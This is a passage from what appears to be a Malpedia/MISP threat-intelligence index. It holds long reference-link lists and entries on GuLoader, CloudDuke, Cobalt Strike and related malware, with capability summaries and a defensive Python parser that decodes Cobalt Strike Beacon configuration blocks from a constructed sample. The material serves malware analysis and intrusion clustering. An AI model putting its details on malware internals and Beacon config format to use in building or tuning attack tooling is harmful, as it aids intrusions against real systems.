https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.youtube.com/watch?v=-FxyzuRv6Wg

https://twitter.com/TheEnergyStory/status/1240608893610459138

https://twitter.com/VK_Intel/status/1257206565146370050

https://www.crowdstrike.com/blog/guloader-malware-analysis/

https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf

https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/

https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter

https://twitter.com/TheEnergyStory/status/1239110192060608513

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/playing-with-guloader-anti-vm-techniques-malware/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://www.youtube.com/watch?v=N0wAh26wShE

https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/

https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update

https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/

https://twitter.com/sysopfb/status/1258809373159305216

https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/

https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/

https://hidocohen.medium.com/guloaders-anti-analysis-techniques-e0d4b8437195

https://elis531989.medium.com/dancing-with-shellcodes-cracking-the-latest-version-of-guloader-75083fb15cb4

https://www.proofpoint.com/us/threat-insight/post/guloader-popular-new-vb6-downloader-abuses-cloud-services

https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-guloader

https://medium.com/@ZainWare/analyzing-guloader-42c1d6a73dfa

https://www.elastic.co/security-labs/getting-gooey-with-guloader-downloader

https://malwation.com/malware-config-extraction-diaries-1-guloader/

https://blog.morphisec.com/guloader-the-rat-downloader

https://clickallthethings.wordpress.com/2021/03/06/oleobject1-bin-ole10native-shellcode/

https://threatresearch.ext.hp.com/malware-campaigns-targeting-african-banking-sector/

https://twitter.com/VK_Intel/status/1255537954304524288

https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland

https://malwarebookreports.com/guloader-navigating-a-maze-of-intricacy/

https://kienmanowar.wordpress.com/2020/06/27/quick-analysis-note-about-guloader-or-cloudeye/

https://research.checkpoint.com/2020/threat-actors-migrating-to-the-cloud/

https://www.crowdstrike.com/blog/guloader-dissection-reveals-new-anti-analysis-techniques-and-code-injection-redundancy/

https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html

https://cert.pl/en/posts/2021/04/keeping-an-eye-on-guloader-reverse-engineering-the-loader/

https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/

https://gi7w0rm.medium.com/cloudeye-from-lnk-to-shellcode-4b5f1d6d877

https://malpedia.caad.fkie.fraunhofer.de/details/win.guloader

https://experience.mandiant.com/trending-evil-2/p/1

https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728

https://labs.k7computing.com/?p=20156

https://labs.vipre.com/unloading-the-guloader/

https://asec.ahnlab.com/en/55978/

https://www.microsoft.com/en-us/security/blog/2023/04/13/threat-actors-strive-to-cause-tax-day-headaches/

https://labs.k7computing.com/?p=21725

https://sansorg.egnyte.com/dl/ALlvwK6fp0

https://forensicitguy.github.io/guloader-executing-shellcode-callbacks/

https://any.run/cybersecurity-blog/deobfuscating-guloader/

CloudWizard

The tag is: misp-galaxy:malpedia="CloudWizard"

CloudWizard is also known as:

Table 3168. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard

https://securelist.com/cloudwizard-apt/109722/

CloudDuke

F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.

The tag is: misp-galaxy:malpedia="CloudDuke"

CloudDuke is also known as:

  • CloudLook

  • MiniDionis

Table 3169. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke

https://www.f-secure.com/weblog/archives/00002822.html

CMSBrute

The tag is: misp-galaxy:malpedia="CMSBrute"

CMSBrute is also known as:

Table 3170. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute

https://securelist.com/the-shade-encryptor-a-double-threat/72087/

CobaltMirage FRP

This Go-written malware was observed during a COBALT MIRAGE campaign; it bundles FRP (Fast Reverse Proxy), published by fatedier on GitHub (https://github.com/fatedier/frp), together with other open source projects.

The tag is: misp-galaxy:malpedia="CobaltMirage FRP"

CobaltMirage FRP is also known as:

Table 3173. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobaltmirage_tunnel

https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us

https://www.deepinstinct.com/blog/iranian-threat-actor-continues-to-develop-mass-exploitation-tools

Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon offers the attacker a wealth of functionality, including, but not limited to, command execution, keylogging, file transfer, SOCKS proxying, privilege escalation, Mimikatz, port scanning and lateral movement. Beacon is in-memory/fileless: it consists of stageless or multi-stage shellcode that, once loaded by exploiting a vulnerability or executing a shellcode loader, reflectively loads itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS and SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
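Because so much of the tradecraft above is driven by Beacon's embedded, Malleable-C2-derived configuration, extracting that configuration is the usual first triage step on a recovered Beacon. The parser below is an added example for this page, not code from the Cobalt Strike product or from any of the referenced parsers. It assumes the layout that open source extractors document: a sequence of big-endian TLV entries (2-byte index, 2-byte type, 2-byte length, value; type 1 = 16-bit integer, type 2 = 32-bit integer, type 3 = raw bytes) XOR-encoded with a single-byte key (0x2E or 0x69) and terminated by zero padding. The field names and the XOR keys are assumptions taken from that public documentation and cover only a subset of indices; the sample blob is constructed for the example and is not a real Beacon.

```python
"""Locate, decode and walk a Cobalt Strike Beacon config block (added example)."""
import struct

# Single-byte XOR keys used by known Beacon builds (assumption: 0x2E for v4, 0x69 for v3)
XOR_KEYS = (0x2E, 0x69)

# Field indices as documented by open source parsers; only a subset is listed (assumption)
FIELD_NAMES = {
    1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize", 5: "Jitter",
    8: "C2Server", 9: "UserAgent", 10: "HttpPostUri", 15: "PipeName",
    37: "Watermark",
}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP",
                8: "HTTPS", 16: "Bind TCP"}


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_config(blob: bytes):
    """Return (key, offset) of the config inside blob, or (None, -1).

    The first two entries are always index 1 and index 2, both 16-bit values
    (type 1, length 2), so their encoded 6-byte headers form a reliable marker
    that is checked under each candidate key.
    """
    head1 = b"\x00\x01\x00\x01\x00\x02"
    head2 = b"\x00\x02\x00\x01\x00\x02"
    for key in XOR_KEYS:
        marker = xor_bytes(head1, key)
        start = 0
        while True:
            off = blob.find(marker, start)
            if off == -1:
                break
            # entry 1 occupies 8 bytes (6-byte header + 2-byte value); entry 2 must follow it
            if xor_bytes(blob[off + 8:off + 14], key) == head2:
                return key, off
            start = off + 1
    return None, -1


def parse_config(blob: bytes) -> dict:
    """Decode the config and return a dict of field name -> value."""
    key, off = find_config(blob)
    if off < 0:
        raise ValueError("no Beacon config header found")
    data = xor_bytes(blob[off:], key)
    fields = {"XorKey": key}
    pos = 0
    while pos + 6 <= len(data):
        idx, typ, length = struct.unpack(">HHH", data[pos:pos + 6])
        if idx == 0:
            break  # an all-zero header is the padding that ends the config
        pos += 6
        raw = data[pos:pos + length]
        if len(raw) != length:
            raise ValueError("truncated entry %d" % idx)
        pos += length
        if typ == 1 and length == 2:
            value = struct.unpack(">H", raw)[0]
        elif typ == 2 and length == 4:
            value = struct.unpack(">I", raw)[0]
        else:
            # byte fields are NUL-padded to a fixed size; keep the string up to the first NUL
            value = raw.split(b"\x00", 1)[0].decode("latin-1")
        name = FIELD_NAMES.get(idx, "Field%d" % idx)
        if name == "BeaconType":
            value = BEACON_TYPES.get(value, "Unknown(%d)" % value)
        fields[name] = value
    return fields


def _entry(idx: int, typ: int, value) -> bytes:
    raw = struct.pack(">H", value) if typ == 1 else struct.pack(">I", value) if typ == 2 else value
    return struct.pack(">HHH", idx, typ, len(raw)) + raw


def build_sample_blob(key: int = 0x2E) -> bytes:
    """Constructed test input (not a real Beacon): a small config, XOR-encoded
    and surrounded by filler bytes, the way it sits inside a Beacon image."""
    config = b"".join([
        _entry(1, 1, 8),                     # BeaconType: HTTPS
        _entry(2, 1, 443),                   # Port
        _entry(3, 2, 60000),                 # SleepTime in ms
        _entry(5, 1, 20),                    # Jitter percent
        _entry(8, 3, b"cdn.example.invalid,/jquery-3.3.1.min.js".ljust(64, b"\x00")),
        _entry(9, 3, b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)".ljust(64, b"\x00")),
        _entry(37, 2, 0x12345678),           # Watermark (licence ID)
    ])
    config += b"\x00" * 16                   # zero padding terminates the walk
    return b"MZ" + b"\x90" * 30 + xor_bytes(config, key) + b"\xCC" * 8


if __name__ == "__main__":
    for name, value in parse_config(build_sample_blob()).items():
        print(f"{name}: {value}")
```

On a real sample the blob passed to `parse_config` would be the Beacon DLL or a memory dump of the injected process; the watermark and C2Server values are the two fields that matter most for clustering intrusions, which is why many of the references below pivot on them.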

The tag is: misp-galaxy:malpedia="Cobalt Strike"

Cobalt Strike is also known as:

  • Agentemis

  • BEACON

  • CobaltStrike

  • cobeacon

Table 3174. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a

https://teamt5.org/tw/posts/mjib-holds-briefing-on-chinese-hackers-attacks-on-taiwanese-government-agencies/

https://security.macnica.co.jp/blog/2022/05/iso.html

https://www.esentire.com/security-advisories/ransomware-hackers-attack-a-top-safety-testing-org-using-tactics-and-techniques-borrowed-from-chinese-espionage-groups

https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/

https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation

https://blog.group-ib.com/apt41-world-tour-2021

https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/

https://embee-research.ghost.io/decoding-a-cobalt-strike-vba-loader-with-cyberchef/

https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b

https://twitter.com/TheDFIRReport/status/1359669513520873473

https://www.prevailion.com/what-wicked-webs-we-unweave/

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf

https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach

https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html

https://www.secureworks.com/research/threat-profiles/tin-woodlawn

https://blog.cobaltstrike.com/

https://isc.sans.edu/diary/27308

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://www.youtube.com/watch?v=C733AyPzkoc

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf

https://www.macnica.net/file/mpression_automobile.pdf

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf

https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e

https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://experience.mandiant.com/trending-evil-2/p/1

https://www.mandiant.com/resources/spear-phish-ukrainian-entities

https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/

https://www.getrevue.co/profile/80vul/issues/hunting-cobalt-strike-dns-redirectors-by-using-zoomeye-580734

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://www.youtube.com/watch?v=WW0_TgWT2gs

https://www.accenture.com/us-en/blogs/security/ransomware-hades

https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/bb-ebook-finding-beacons-in-the-dark.pdf

https://www.inde.nz/blog/different-kind-of-zoombomb

https://skyblue.team/posts/scanning-virustotal-firehose/

https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates

https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/

https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf

https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/

https://blogs.blackberry.com/en/2021/08/blackberry-prevents-threat-actor-group-ta575-and-dridex-malware

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021

https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/

https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html

https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/

https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/

https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://lab52.io/blog/beyond-appearances-unknown-actor-using-apt29s-ttp-against-chinese-users/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://www.ic3.gov/Media/News/2021/210823.pdf

https://www.blackarrow.net/leveraging-microsoft-teams-to-persist-and-cover-up-cobalt-strike-traffic/

https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf

https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive

https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html

https://unit42.paloaltonetworks.com/fireeye-red-team-tool-breach/

https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/

https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html

https://cert.gov.ua/article/37704

https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/

https://twitter.com/VK_Intel/status/1294320579311435776

https://thedfirreport.com/2022/03/07/2021-year-in-review/

http://blog.nsfocus.net/murenshark

https://redcanary.com/blog/intelligence-insights-december-2021

https://www.cobaltstrike.com/support

https://github.com/sophos-cybersecurity/solarwinds-threathunt

https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html

https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html

https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis

https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf

https://twitter.com/alex_lanstein/status/1399829754887524354

https://www.youtube.com/watch?v=FC9ARZIZglI

https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor

https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf

https://blog.morphisec.com/proxyshell-exchange-exploitation-now-leads-to-an-increasing-amount-of-cobaltstrike-backdoors

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728

https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf

https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting

https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/

https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf

https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html

https://isc.sans.edu/diary/rss/27176

https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/

https://asec.ahnlab.com/en/31811/

https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/

https://www.mandiant.com/media/12596/download

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html

https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/

https://401trg.com/burning-umbrella/

https://www.istrosec.com/blog/apt-sk-cobalt/

https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/

https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications

https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader

https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a

https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/

https://embee-research.ghost.io/ghidra-entropy-analysis-locating-decryption-functions/

https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664

https://cert.gov.ua/article/703548

https://blog.exatrack.com/melofee/

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://zero.bs/cobaltstrike-beacons-analyzed.html

https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/

https://isc.sans.edu/diary/26752

https://twitter.com/felixw3000/status/1521816045769662468

https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html

https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/

https://blog.group-ib.com/opera1er-apt

https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py

https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack

https://redcanary.com/blog/grief-ransomware/

https://twitter.com/ffforward/status/1324281530026524672

https://x.com/embee_research/status/1737325167024738425?s=46

https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/

https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/

https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf

https://www.secureworks.com/research/darktortilla-malware-analysis

https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/

https://www.trendmicro.com/en_us/research/21/a/earth-wendigo-injects-javascript-backdoor-to-service-worker-for-.html

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/

https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ

https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks

https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/

https://twitter.com/MsftSecIntel/status/1522690116979855360

https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware

https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/

https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks

https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f

https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html

https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/

https://us-cert.cisa.gov/ncas/alerts/aa21-265a

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf

https://twitter.com/cglyer/status/1480742363991580674

https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/

https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf

https://asec.ahnlab.com/en/34549/

https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20

https://cyber.wtf/2022/03/23/what-the-packer/

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://www.youtube.com/watch?v=6SDdUVejR2w

https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/

https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671

https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html

https://securelist.com/apt-trends-report-q2-2020/97937/

https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/

https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes

https://www.youtube.com/watch?v=GfbxHy6xnbA

https://twitter.com/TheDFIRReport/status/1356729371931860992

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://attack.mitre.org/groups/G0096

https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems

https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf

https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/

https://awakesecurity.com/blog/catching-the-white-stork-in-flight/

https://web.br.de/interaktiv/ocean-lotus/en/

https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html

https://malware-traffic-analysis.net/2021/09/29/index.html

https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41

https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf

https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/

https://msrc.microsoft.com/blog/2022/10/hunting-for-cobalt-strike-mining-and-plotting-for-fun-and-profit/

https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/

https://www.youtube.com/watch?v=borfuQGrB8g

https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html

https://www.malware-traffic-analysis.net/2023/10/03/index.html

https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/

https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink

https://www.qurium.org/alerts/targeted-malware-against-crph/

https://embee-research.ghost.io/shodan-censys-queries/

https://kienmanowar.wordpress.com/2022/06/04/quicknote-cobaltstrike-smb-beacon-analysis-2/

https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/

https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5

https://malwarelab.eu/posts/fin6-cobalt-strike/

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://unit42.paloaltonetworks.com/cobalt-strike-memory-analysis/

https://www.mandiant.com/resources/evolution-of-fin7

https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/

https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads

https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot

https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware

